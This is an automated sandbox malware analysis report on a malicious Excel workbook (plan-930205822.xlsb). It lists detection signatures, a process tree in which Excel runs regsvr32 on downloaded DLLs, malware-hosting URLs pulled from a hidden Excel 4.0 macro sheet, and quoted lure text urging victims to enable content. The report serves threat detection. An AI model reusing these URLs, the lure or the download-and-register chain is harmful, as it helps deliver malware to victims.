Loading ...

Play interactive tourEdit tour

Windows Analysis Report plan-930205822.xlsb

Overview

General Information

Sample Name:plan-930205822.xlsb
Analysis ID:439554
MD5:a9632052eafc78ee7e2225a59aefa468
SHA1:2bade21221f175cda46c2d819746674579f28f2d
SHA256:ae39ed7fd03aae627c65cdb4d7fb0a938fc4f328e2611da087589cc57ca7c3dd
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5716 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 4220 cmdline: regsvr32 ..\gihi1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 1956 cmdline: regsvr32 ..\gihi2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\gihi1.dll, CommandLine: regsvr32 ..\gihi1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5716, ProcessCommandLine: regsvr32 ..\gihi1.dll, ProcessId: 4220

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://gruasphenbogota.com/C74hwGGxi/ka.htmlAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: https://gruasphenbogota.com/C74hwGGxi/ka.htmlVirustotal: Detection: 11%Perma Link
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.3:49718 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
Source: global trafficDNS query: name: carpascapital.com
Source: global trafficTCP traffic: 192.168.2.3:49715 -> 50.116.92.246:443
Source: global trafficTCP traffic: 192.168.2.3:49715 -> 50.116.92.246:443
Source: excel.exeMemory has grown: Private usage: 1MB later: 152MB
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: carpascapital.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.aadrm.com/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.cortana.ai
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.office.net
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.onedrive.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://augloop.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: intlsheet1.binString found in binary or memory: https://carpascapital.com/gBPg8MtsGbv/ka.html
Source: intlsheet1.binString found in binary or memory: https://carpascapital.com/gBPg8MtsGbv/ka.html%
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://cdn.entity.
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://clients.config.office.net/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://config.edge.skype.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://cortana.ai
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://cortana.ai/api
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://cr.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://dev.cortana.ai
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://devnull.onenote.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://directory.services.
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://graph.windows.net
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://graph.windows.net/
Source: intlsheet1.binString found in binary or memory: https://gruasphenbogota.com/C74hwGGxi/ka.html
Source: intlsheet1.binString found in binary or memory: https://gruasphenbogota.com/C74hwGGxi/ka.html%
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://lifecycle.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://login.windows.local
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://management.azure.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://management.azure.com/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://messaging.office.com/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://ncus.contentsync.
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://officeapps.live.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://onedrive.live.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://outlook.office.com/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://outlook.office365.com/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://settings.outlook.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://staging.cortana.ai
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://tasks.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://wus2.contentsync.
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 57891FD6-44C4-41E2-9BAC-FD1A025B680A.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.3:49718 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. 15 "' 16 0 Protected
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 19 the decryption of the docum
Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. ' 15 ,, :: 0 Protecte
Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 19 the decryption of the docum
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: plan-930205822.xlsbInitial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: plan-930205822.xlsbInitial sample: Sheet size: 22026
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal84.expl.evad.winXLSB@5/4@2/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{7FBCFE35-4776-4F83-953A-7D04971807BE} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi2.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi2.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: plan-930205822.xlsbInitial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
